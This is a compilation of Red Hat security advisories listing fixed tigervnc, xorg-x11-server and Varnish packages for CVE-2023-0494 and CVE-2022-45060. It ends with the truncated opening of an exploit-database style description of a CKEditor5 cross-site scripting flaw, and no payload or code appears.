tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.1.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.1.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.1.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.1.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.1.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.1.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0494  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+QTXtzjgjWX9erEAQiwgQ//T0eqmsNqaCB78rgK20ELopOaCfTSXD5r  
t2gDxiWOy8pn0Ah9gYKfX4DExFxL22u73N+YUHJbp6YznCdliNvP4XXZueOCbtSc  
7CIypf8NHRb5UFnFVDfqi5GJtW9zm1hqJflSGNRtjkDzRrL3+dyefAXuWXQBNVVy  
RSx/y1dkKvjaz63/vTIWLbC47p0144Sb1moblVB+tbNeopgBwMvTR8mww2PIlUfm  
uSho28KdQJ62sIw7V49LWa3+Bs06j9QuOWtR79A9QfvxKFwtY0SGX7gpxm+GwZ2d  
cm3ky4bfvacMBUeCKUbnNer1yawL2G8y7HU0lSXLF2kUsAVuwINVVc6fIs8rIoKH  
aJEGt+uQo9b/DvJXHPlgaf0ng4eeZ6WHjauBObaMUoroGtq54R+pIXXTSqN8Gf/w  
+lwRgpCSZqfrpzZIL8/ojR7iX2Kg6jp/cnk/4+byrcWfnjSBIC8PfdJp7evxGRig  
C+eaOwlDcp2ws5euOs/yE2R4LuOwAoOSsD3ZCZa+plvFQWvEBFOeW8BKECaLPAgu  
5Qn+cp++aUc5HBlfNP/lfLBgKQ0YyajiekKdrx0gAZPn5mYVO1jsFZhkyVlbTKBA  
ApRsDt9P8vip9B3TJEv7J6DWkO9Bmd/pGQXJPbjzZUWd/HSIanwnwJRsGPu99gjm  
l6qhMDHeaVE=  
=dMxu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0671-01

Red Hat Security Advisory 2023-0675-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc and xorg-x11-server security update  
Advisory ID:       RHSA-2023:0675-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0675  
Issue date:        2023-02-08  
CVE Names:         CVE-2023-0494   
=====================================================================

1. Summary:

An update for tigervnc and xorg-x11-server is now available for Red Hat  
Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

X.Org is an open-source implementation of the X Window System. It provides  
the basic low-level functionality that full-fledged graphical user  
interfaces are designed upon.

Security Fix(es):

* xorg-x11-server: DeepCopyPointerClasses use-after-free leads to privilege  
elevation (CVE-2023-0494)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2165995 - CVE-2023-0494 xorg-x11-server: DeepCopyPointerClasses use-after-free leads to privilege elevation

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
tigervnc-1.8.0-24.el7_9.src.rpm  
xorg-x11-server-1.20.4-22.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-24.el7_9.noarch.rpm  
tigervnc-license-1.8.0-24.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-24.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-22.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
tigervnc-1.8.0-24.el7_9.src.rpm

noarch:  
tigervnc-license-1.8.0-24.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
xorg-x11-server-1.20.4-22.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-24.el7_9.noarch.rpm  
tigervnc-server-applet-1.8.0-24.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-22.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
tigervnc-1.8.0-24.el7_9.src.rpm  
xorg-x11-server-1.20.4-22.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-24.el7_9.noarch.rpm  
tigervnc-license-1.8.0-24.el7_9.noarch.rpm

ppc64:  
tigervnc-1.8.0-24.el7_9.ppc64.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.ppc64.rpm  
tigervnc-server-1.8.0-24.el7_9.ppc64.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.ppc64.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.ppc64.rpm

ppc64le:  
tigervnc-1.8.0-24.el7_9.ppc64le.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.ppc64le.rpm  
tigervnc-server-1.8.0-24.el7_9.ppc64le.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.ppc64le.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.ppc64le.rpm

s390x:  
tigervnc-1.8.0-24.el7_9.s390x.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.s390x.rpm  
tigervnc-server-1.8.0-24.el7_9.s390x.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.s390x.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.s390x.rpm

x86_64:  
tigervnc-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-24.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-22.el7_9.noarch.rpm

ppc64:  
tigervnc-debuginfo-1.8.0-24.el7_9.ppc64.rpm  
tigervnc-server-module-1.8.0-24.el7_9.ppc64.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.ppc.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.ppc64.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.ppc.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.ppc64.rpm

ppc64le:  
tigervnc-debuginfo-1.8.0-24.el7_9.ppc64le.rpm  
tigervnc-server-module-1.8.0-24.el7_9.ppc64le.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.ppc64le.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.ppc64le.rpm

s390x:  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.s390x.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.s390x.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
tigervnc-1.8.0-24.el7_9.src.rpm  
xorg-x11-server-1.20.4-22.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-24.el7_9.noarch.rpm  
tigervnc-license-1.8.0-24.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xephyr-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-24.el7_9.noarch.rpm  
xorg-x11-server-source-1.20.4-22.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-24.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-24.el7_9.x86_64.rpm  
xorg-x11-server-Xdmx-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-22.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-22.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0494  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+QTWNzjgjWX9erEAQhqExAAhTuxjE6b0n+mLaJXhtqsMvGqagS5CQLg  
SHui25NN8PO5m+bR5R+N4c5r1vw6AXJlxLHS8ShOgRuIdLMlDp8Kismz2ZIFcHGO  
vo2AEo832/YAYmTHGBPK6yPQCl75RQfpgcv0uO75RTnFRH90VSGoYydjXYXkvCGT  
4k7bZ+PUF6mHGyPvfJ75dYud4uCVAdgHjGSGo1/v2ItabUE10TItk5mVAJi3HNaZ  
vjLviS0Jdb4j5VfqieRh/HZ9iTAAjMXX8wOrn3q9+Sanu/wqz4JTvC/ylKYNDmEJ  
ayHGyykVGSZJMEf9BhfTFdYtg2Mu+/3XWHKUgaKr+6CVCmsQrKEy0J+w9M6qsZUA  
SSHsGO8lg1iGSdmYPDNNRQIATF4Z6BoQd0Vbs3zpP3VRXi65b4jJ0abso1WqhF7R  
ZS2w9b+m47GrZusU78VfxVvGLwRtlHHv4f00qJtpowNHkkx6KA9CD0rZASzf410o  
sJFCvalqv+VMFl5FUxjMCFrzU5I9M/bNcgf8GS81Txlblki9+3cRlZgQqWvz+2mQ  
shy7vN9pbotD1w+0h89AnGnunpqpMBUMHS4PMf16DqkDvmwpD3uz8YghVvUf766e  
Q8/OfCVTw4387YFR3E1CDjUnIP94ltZLTCwYrFlb9Gc/brVESdHG4k53kPCs8ZK4  
0jOZIyHKVBE=  
=wTD6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0675-01

Red Hat Security Advisory 2023-0673-01 - Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: rh-varnish6-varnish security update  
Advisory ID:       RHSA-2023:0673-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0673  
Issue date:        2023-02-08  
CVE Names:         CVE-2022-45060   
=====================================================================

1. Summary:

An update for rh-varnish6-varnish is now available for Red Hat Software  
Collections.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Varnish Cache is a high-performance HTTP accelerator. It stores web pages  
in memory so web servers don't have to create the same web page over and  
over again, giving the website a significant speed up.

Security Fix(es):

* varnish: Request Forgery Vulnerability (CVE-2022-45060)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2141844 - CVE-2022-45060 varnish: Request Forgery Vulnerability

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-varnish6-varnish-6.0.8-2.el7.2.src.rpm

ppc64le:  
rh-varnish6-varnish-6.0.8-2.el7.2.ppc64le.rpm  
rh-varnish6-varnish-devel-6.0.8-2.el7.2.ppc64le.rpm  
rh-varnish6-varnish-docs-6.0.8-2.el7.2.ppc64le.rpm  
rh-varnish6-varnish-libs-6.0.8-2.el7.2.ppc64le.rpm

s390x:  
rh-varnish6-varnish-6.0.8-2.el7.2.s390x.rpm  
rh-varnish6-varnish-devel-6.0.8-2.el7.2.s390x.rpm  
rh-varnish6-varnish-docs-6.0.8-2.el7.2.s390x.rpm  
rh-varnish6-varnish-libs-6.0.8-2.el7.2.s390x.rpm

x86_64:  
rh-varnish6-varnish-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-devel-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-docs-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-libs-6.0.8-2.el7.2.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-varnish6-varnish-6.0.8-2.el7.2.src.rpm

x86_64:  
rh-varnish6-varnish-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-devel-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-docs-6.0.8-2.el7.2.x86_64.rpm  
rh-varnish6-varnish-libs-6.0.8-2.el7.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45060  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+QTUtzjgjWX9erEAQhbdw/5Aa77Dj829eRtWXBHVXuocamZ1Ejr0rih  
0+buN5z/yvp2TcE88aBfs1mV+DIiv3syc1FGj6lwMa+jul04GoaeB4m8mta2LI+z  
nhR38FDQJ8ndUOF5Xq+HFHW+Dm62CSBFxY9VJuZ6q/m+1sQM5duf/DRh470lbSe4  
eUjVf+zqMTAYyUM/KgoDLKjzs9X/PUbYNu/woVWptVOryQWNuGoweAOyaTGjD2No  
FGO8Dbn9W045i+P/rUMgbhZVYxIwMSgLwI52XUpARkktyklII2oUJiECwotw3Ovt  
XvnATmUqz6ws3mwp4iaEqWX9i4FieWevjCqoW+Xe5SWbIP9d2AvJZ2aIQNxJRhab  
v2oS8Ac2XpXCaU7LVaCiAwaATdfZ5KWVsQdbJnY44IY6mXSBCfGX5CNSR+a9lxCe  
SmQkHM/F44rsKaw8BnwrvMecdaxiig+UbXkvbZkdY4FvkqA+79XEPQQNp+nxsMAp  
NCVjk64MRwkyNChWm9vuIwBmd0i2die7un/8N02TMWlnw2CZ+/GfXX/wod8gKq62  
acGsWH7qhnl2YRfGBJsKeCyvfoHXFuJrBXWHaf4w2MVME6D2R3mnDV8YkQ6FEXfk  
sLwvVhrEMRI6BIW5oTk60na3Tt6cM+LJqh6DCINtSD4Oei1BcxuZZ78CgliaDvUK  
NpW7dZrkDMI=  
=fnQ9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0673-01

CKSource CKEditor5 version 35.4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Cross Site Scripting in CKSource's CKEditor5 35.4.0# Google Dork: N/A# Date: February 09, 2023# Exploit Author: Manish Pathak# Vendor Homepage: https://cksource.com/# Software Link: https://ckeditor.com/ckeditor-5/download/# Version: 35.4.0# Tested on: Linux / Web# CVE : CVE-2022-48110CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting(XSS) vulnerability via Full Featured CKEditor5 Widget as the editor failsto sanitize user provided data.An attacker can execute arbitrary script in the browser in the context ofthe affected site. This can allow the attacker to steal cookie-basedauthentication credentials and launch other attacks.CKEditor5 version 35.4.0 is tested & found to be vulnerable.Documentation avaiable 